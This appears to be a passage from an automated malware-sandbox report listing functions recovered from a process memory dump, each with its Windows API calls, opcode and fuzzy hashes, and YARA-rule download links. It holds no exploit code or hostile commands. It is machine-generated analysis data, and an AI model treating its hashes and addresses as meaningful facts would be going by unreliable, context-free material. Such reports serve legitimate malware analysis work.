                                    Function 011E2D22, Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ErrorMode$FullNamePath
                                    • String ID:
                                    • API String ID: 268959451-0
                                    • Opcode ID: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                    • Instruction ID: 4966c4f414c69bd40c7ef73025f77b80acc0af26ced68ebd90731c41d3a9fc39
                                    • Opcode Fuzzy Hash: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                    • Instruction Fuzzy Hash: B4414639500501ABCF2CDFE8D8698BEB7EEFF88704714851DEA06C7244E771AA41C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DEEF0, Relevance: 6.1, APIs: 4, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                    • RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                    • _setjmp3.MSVCRT ref: 011DEFA5
                                    • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DF00D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: FreeHeap$ProcessVirtual_setjmp3
                                    • String ID:
                                    • API String ID: 2613391085-0
                                    • Opcode ID: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                    • Instruction ID: 32d94aa905706fb3b5fd6c586a578578908704fa008467da15e92370d5f46cb2
                                    • Opcode Fuzzy Hash: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                    • Instruction Fuzzy Hash: 10319C716012119FEB3DEF6EB80C72A7AE5BB54B19F14416EE509CB285DB70D880CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F579A, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,011E3A4E,?,?,?,?,?,?,?,?), ref: 011F57DE
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F581D
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5825
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5867
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
                                    • String ID:
                                    • API String ID: 162963024-0
                                    • Opcode ID: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                    • Instruction ID: 3470260970c4f6054cff1013fd6ad86558c2cb568a0ebd0c722e94788eab0564
                                    • Opcode Fuzzy Hash: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                    • Instruction Fuzzy Hash: 53212C35700A029BD738EBB99C5C9BE775BDFD4254B19022CEE0687284DF718E4187A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F29B9, Relevance: 6.1, APIs: 4, Instructions: 85memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A34
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A3B
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A4D
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2A54
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$Process$AllocFree
                                    • String ID:
                                    • API String ID: 756756679-0
                                    • Opcode ID: 6fa60d7e79a3e40e8fc35647d52b77907693c8a6404d2fe79977106f15287ac0
                                    • Instruction ID: f1e68768cc038b9fca5a46d3a0311cdfb8e442dac5001c7270271d2d0dc97ed5
                                    • Opcode Fuzzy Hash: 6fa60d7e79a3e40e8fc35647d52b77907693c8a6404d2fe79977106f15287ac0
                                    • Instruction Fuzzy Hash: D9311375A00604EFCB29DF69D49895ABBF5FF48310B04856EEE4A87714EB30E941CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4E94, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000104,00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF016
                                    • _get_osfhandle.MSVCRT ref: 011EF01E
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF02C
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
                                    • String ID:
                                    • API String ID: 1629431960-0
                                    • Opcode ID: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                    • Instruction ID: 2e8e8ef8b68457230fb79b11b6cbd85ca4eb97679f866bedc89ea06818a08adb
                                    • Opcode Fuzzy Hash: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                    • Instruction Fuzzy Hash: 0321F571A00B069FE7389FB4E44CB7ABBE5EF24715F04082EE846C6140EB75D801CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DAEB0, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wcstol.MSVCRT ref: 011DAEC7
                                    • wcstol.MSVCRT ref: 011DAED7
                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF51
                                    • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF5B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcstol$lstrcmplstrcmpi
                                    • String ID:
                                    • API String ID: 4273384694-0
                                    • Opcode ID: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                    • Instruction ID: c35f12d9e28c13a1475bf28ff1810d70f98651d886688a9cd6f5d20969a42f23
                                    • Opcode Fuzzy Hash: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                    • Instruction Fuzzy Hash: A511A5B2900526AB8B6DDE7CFA5C8797B68FF0125470603D0E901D79C4D725ED60C6D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F997C, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011F99B8
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,011D2178,00310030), ref: 011F99FC
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D2178,00310030), ref: 011F9A2E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9A3E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$DriveFullNamePathType
                                    • String ID:
                                    • API String ID: 3442494845-0
                                    • Opcode ID: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                    • Instruction ID: 71ba0e9fa0b896792e1cd5a68a757bbc540353d7ae598a7f4be2f3a570a5bef6
                                    • Opcode Fuzzy Hash: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                    • Instruction Fuzzy Hash: 26213571A0011E9BDF25DFE8EC89BBE77B8EB14308F0401A9A605E2141E775DA448B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F5662, Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,011FC100,0000001C,011F4C85), ref: 011F5695
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,011FC100,0000001C,011F4C85), ref: 011F56B0
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 011F56EF
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F570C
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: QueryValue$ErrorLastOpen
                                    • String ID:
                                    • API String ID: 4270309053-0
                                    • Opcode ID: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                    • Instruction ID: a53c6d3f8941d9532d4033516e2c3ffa7e9753d75c1f43f1f85f549d2c8fe1c7
                                    • Opcode Fuzzy Hash: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                    • Instruction Fuzzy Hash: E42150B1D0061AEFEF589FD998949EEBABEFF58654B404119EA11F3180DB748D408BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D56AE, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                    • Instruction ID: cfc303fd70615c32d237e95fe4f00c6868202794dbac1804ea7544138eead1f6
                                    • Opcode Fuzzy Hash: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                    • Instruction Fuzzy Hash: D8110831A00B0CABDF2D9B98A82CBBE7BA9DB49328F14411AF911D70D0DB70D940CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FB91D, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011FB953
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 011FB98D
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB9A5
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FB9B9
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$DriveNamePathTypeVolume
                                    • String ID:
                                    • API String ID: 1029679093-0
                                    • Opcode ID: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                    • Instruction ID: e7cc721ea439e4f1ce3fc2d05b13b0f85f9db091b48783af27da552c08689174
                                    • Opcode Fuzzy Hash: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                    • Instruction Fuzzy Hash: 72115471A04109ABDF24DAE9EC89BBFBBB8FB54348F48006DA614D3141EB34DA44C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F916C, Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F9185
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F918D
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011F91A4
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011F91D1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                    • String ID:
                                    • API String ID: 2448200120-0
                                    • Opcode ID: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                    • Instruction ID: 499c3324025d5890067361c84f672c64880c49859f969036f7d5f2ee01bbea58
                                    • Opcode Fuzzy Hash: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                    • Instruction Fuzzy Hash: ED11B2316042199BEF3DEB95F85CB7E7769EB9572DF00402DFA0482184DF709840C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DAC30, Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DAC8E
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DAC95
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACBE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACC5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                    • Instruction ID: 6348abebaca485cdcab2db9325b7d55d81ac5ea499bb28ba1979bbe6f0d0d36c
                                    • Opcode Fuzzy Hash: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                    • Instruction Fuzzy Hash: 701190316042409BDB28EF69B4587767FA5BF55238F24444DE58A8B285CB20D882CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E5D59, Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 011E5D9D
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E5DA4
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$AllocProcess
                                    • String ID:
                                    • API String ID: 1617791916-0
                                    • Opcode ID: 4ba294cf1c91c51b44c16f661740f0fed713df5f588078cb65855562d12d64c6
                                    • Instruction ID: 0f5a41989acc2c0d18a20331048d3f20a51405a75de3d5e67516c39bbb082f85
                                    • Opcode Fuzzy Hash: 4ba294cf1c91c51b44c16f661740f0fed713df5f588078cb65855562d12d64c6
                                    • Instruction Fuzzy Hash: D7114C39A04D1157CA7CEA99641CBBF2BD7FF94A28B1A0148ED075B24CCF228C438791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E0100, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,011DEBC3), ref: 011E0117
                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E011E
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011E0133
                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E013A
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$Process$AllocSize
                                    • String ID:
                                    • API String ID: 2549470565-0
                                    • Opcode ID: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                    • Instruction ID: e2a7a4aa19491613736b4a0f1eaa3d6b69ab3a3bdc62ec0be1301525b8a0adc7
                                    • Opcode Fuzzy Hash: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                    • Instruction Fuzzy Hash: 9601F5723006019BDB25DB99FC8CF9A7BE9FB98765F250024F60ACA040DF71D884CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F7DF1, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E19
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E26
                                    • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E4A
                                    • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E52
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                    • String ID:
                                    • API String ID: 1033415088-0
                                    • Opcode ID: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                    • Instruction ID: 2329a96a56c81efd7d0546561d12292f04eb504c50e147800c7a24bf01edc832
                                    • Opcode Fuzzy Hash: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                    • Instruction Fuzzy Hash: C801F532A04128AF8F18DFB4AC489FFB7FCEF1D214B00012AF916D2180EB249E41C3A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6D00, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
                                    • String ID:
                                    • API String ID: 1063105408-0
                                    • Opcode ID: 3c5deb9ecaa0acb2f520498a0b6c59ca6dc1e01f3bdae5207fec74ced7b54b32
                                    • Instruction ID: 550b7e3ba0860eacf3b7868c957b2cfc2887db86a85fd678a6cf72e94b96051c
                                    • Opcode Fuzzy Hash: 3c5deb9ecaa0acb2f520498a0b6c59ca6dc1e01f3bdae5207fec74ced7b54b32
                                    • Instruction Fuzzy Hash: 61115A70904B04DAEB3C9FB4B04C23836E1FB18359FA4462EE066861D5DB3789C1CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D43A0, Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 011D43D5
                                    • _open_osfhandle.MSVCRT ref: 011D43E9
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011D4401
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E838D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                    • String ID:
                                    • API String ID: 22757656-0
                                    • Opcode ID: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                    • Instruction ID: c46d2590374e1c5e5ed94f8303d3313607c23a97add8386e0a967e63a5608983
                                    • Opcode Fuzzy Hash: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                    • Instruction Fuzzy Hash: DB01F232804220ABD728ABACB80DB5EBBA8AB51B39F110319F974E31C0DFB008458791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3B2C, Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,011E3DBB), ref: 011EDFEA
                                    • RtlFreeHeap.NTDLL(00000000,?,011E3DBB), ref: 011EDFF1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                    • String ID:
                                    • API String ID: 197374240-0
                                    • Opcode ID: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                    • Instruction ID: 4c487068d14a3d6b0647b84abe2f30d3305ad894d05d26a4459f6eacb17d4a89
                                    • Opcode Fuzzy Hash: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
